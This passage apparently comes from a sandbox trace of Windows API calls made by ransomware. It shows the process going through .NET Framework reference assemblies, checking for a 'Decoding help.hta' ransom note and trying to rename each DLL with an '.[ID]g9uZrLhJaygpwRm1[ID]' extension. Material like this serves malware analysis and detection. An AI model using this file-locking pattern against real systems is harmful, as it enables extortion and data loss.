Assemblies\\Microsoft\\Framework\\v3.5\\System.AddIn.Contract.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.AddIn.Contract.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0056.625] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.AddIn.Contract.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.addin.contract.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.AddIn.Contract.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.addin.contract.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0056.629] FindNextFileW (in: hFindFile=0x5e2cb0, lpFindFileData=0x16b9fd30 | out: lpFindFileData=0x16b9fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xace922ee, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xace922ee, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xacfe8f51, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x28000, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.AddIn.dll", cAlternateFileName="")) returned 1 [0056.631] lstrcpyW (in: lpString1=0x2aac8fb0, lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0056.631] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 70 [0056.631] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" [0056.631] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\decoding help.hta")) returned 0x1 [0056.632] lstrcmpiW (lpString1="Decoding help.hta", lpString2="System.AddIn.dll") returned -1 [0056.632] lstrlenW (lpString="System.AddIn.dll") returned 16 [0056.632] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0056.632] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 70 [0056.632] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="System.AddIn.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.AddIn.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.AddIn.dll" [0056.632] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.AddIn.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.AddIn.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.AddIn.dll" [0056.632] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.AddIn.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.AddIn.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.AddIn.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0056.632] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.AddIn.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.addin.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.AddIn.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.addin.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0056.632] FindNextFileW (in: hFindFile=0x5e2cb0, lpFindFileData=0x16b9fd30 | out: lpFindFileData=0x16b9fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac3b5e7a, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xac3b5e7a, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xac4c081c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xe000, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.ComponentModel.DataAnnotations.dll", cAlternateFileName="")) returned 1 [0056.632] lstrcpyW (in: lpString1=0x2aac8fb0, lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0056.632] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 70 [0056.632] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" [0056.632] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\decoding help.hta")) returned 0x1 [0056.632] lstrcmpiW (lpString1="Decoding help.hta", lpString2="System.ComponentModel.DataAnnotations.dll") returned -1 [0056.632] lstrlenW (lpString="System.ComponentModel.DataAnnotations.dll") returned 41 [0056.632] lstrcmpiW (lpString1="[ID]", lpString2=".dll") returned 1 [0056.632] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0056.632] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 70 [0056.632] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="System.ComponentModel.DataAnnotations.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.ComponentModel.DataAnnotations.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.ComponentModel.DataAnnotations.dll" [0056.632] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.ComponentModel.DataAnnotations.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.ComponentModel.DataAnnotations.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.ComponentModel.DataAnnotations.dll" [0056.632] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.ComponentModel.DataAnnotations.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.ComponentModel.DataAnnotations.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.ComponentModel.DataAnnotations.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0056.633] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.ComponentModel.DataAnnotations.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.componentmodel.dataannotations.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.ComponentModel.DataAnnotations.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.componentmodel.dataannotations.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0056.633] FindNextFileW (in: hFindFile=0x5e2cb0, lpFindFileData=0x16b9fd30 | out: lpFindFileData=0x16b9fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae496e97, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xae496e97, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xae5092b8, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xa3000, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Core.dll", cAlternateFileName="")) returned 1 [0056.633] lstrcpyW (in: lpString1=0x2aac8fb0, lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0056.633] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 70 [0056.633] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" [0056.633] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\decoding help.hta")) returned 0x1 [0056.633] lstrcmpiW (lpString1="Decoding help.hta", lpString2="System.Core.dll") returned -1 [0056.633] lstrlenW (lpString="System.Core.dll") returned 15 [0056.633] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0056.633] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 70 [0056.633] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="System.Core.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Core.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Core.dll" [0056.633] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Core.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Core.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Core.dll" [0056.633] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Core.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Core.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Core.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0056.633] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Core.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.core.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Core.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.core.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0056.639] FindNextFileW (in: hFindFile=0x5e2cb0, lpFindFileData=0x16b9fd30 | out: lpFindFileData=0x16b9fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadfae12e, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xadfae12e, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xadfd428e, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xd000, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Data.DataSetExtensions.dll", cAlternateFileName="")) returned 1 [0056.639] lstrcpyW (in: lpString1=0x2aae1018, lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0056.639] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 70 [0056.639] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" [0056.639] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\decoding help.hta")) returned 0x1 [0056.639] lstrcmpiW (lpString1="Decoding help.hta", lpString2="System.Data.DataSetExtensions.dll") returned -1 [0056.639] lstrlenW (lpString="System.Data.DataSetExtensions.dll") returned 33 [0056.639] lstrcmpiW (lpString1="[ID]", lpString2=".dll") returned 1 [0056.639] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0056.639] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 70 [0056.639] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="System.Data.DataSetExtensions.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.DataSetExtensions.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.DataSetExtensions.dll" [0056.639] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.DataSetExtensions.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.DataSetExtensions.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.DataSetExtensions.dll" [0056.639] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.DataSetExtensions.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.DataSetExtensions.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.DataSetExtensions.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0056.639] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.DataSetExtensions.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.data.datasetextensions.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.DataSetExtensions.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.data.datasetextensions.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0056.640] FindNextFileW (in: hFindFile=0x5e2cb0, lpFindFileData=0x16b9fd30 | out: lpFindFileData=0x16b9fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac558d9d, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xac558d9d, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xac6898a0, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x38000, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Data.Entity.Design.dll", cAlternateFileName="")) returned 1 [0056.640] lstrcpyW (in: lpString1=0x2aae1018, lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0056.640] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 70 [0056.640] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" [0056.640] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\decoding help.hta")) returned 0x1 [0056.640] lstrcmpiW (lpString1="Decoding help.hta", lpString2="System.Data.Entity.Design.dll") returned -1 [0056.640] lstrlenW (lpString="System.Data.Entity.Design.dll") returned 29 [0056.640] lstrcmpiW (lpString1="[ID]", lpString2=".dll") returned 1 [0056.640] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0056.640] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 70 [0056.640] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="System.Data.Entity.Design.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Entity.Design.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Entity.Design.dll" [0056.640] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Entity.Design.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Entity.Design.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Entity.Design.dll" [0056.640] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Entity.Design.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Entity.Design.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Entity.Design.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0056.640] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Entity.Design.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.data.entity.design.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Entity.Design.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.data.entity.design.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0056.640] FindNextFileW (in: hFindFile=0x5e2cb0, lpFindFileData=0x16b9fd30 | out: lpFindFileData=0x16b9fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0a1495c, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb0a1495c, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb0a60c1c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2bf000, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Data.Entity.dll", cAlternateFileName="")) returned 1 [0056.640] lstrcpyW (in: lpString1=0x2aae1018, lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0056.640] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 70 [0056.640] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" [0056.640] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\decoding help.hta")) returned 0x1 [0056.641] lstrcmpiW (lpString1="Decoding help.hta", lpString2="System.Data.Entity.dll") returned -1 [0056.641] lstrlenW (lpString="System.Data.Entity.dll") returned 22 [0056.641] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0056.641] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 70 [0056.641] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="System.Data.Entity.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Entity.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Entity.dll" [0056.641] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Entity.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Entity.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Entity.dll" [0056.641] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Entity.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Entity.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Entity.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0056.641] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Entity.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.data.entity.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Entity.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.data.entity.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0056.641] FindNextFileW (in: hFindFile=0x5e2cb0, lpFindFileData=0x16b9fd30 | out: lpFindFileData=0x16b9fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac6898a0, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xac6898a0, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xaca8ddc7, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xa7000, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Data.Linq.dll", cAlternateFileName="")) returned 1 [0056.641] lstrcpyW (in: lpString1=0x2aae1018, lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0056.641] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 70 [0056.641] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" [0056.641] 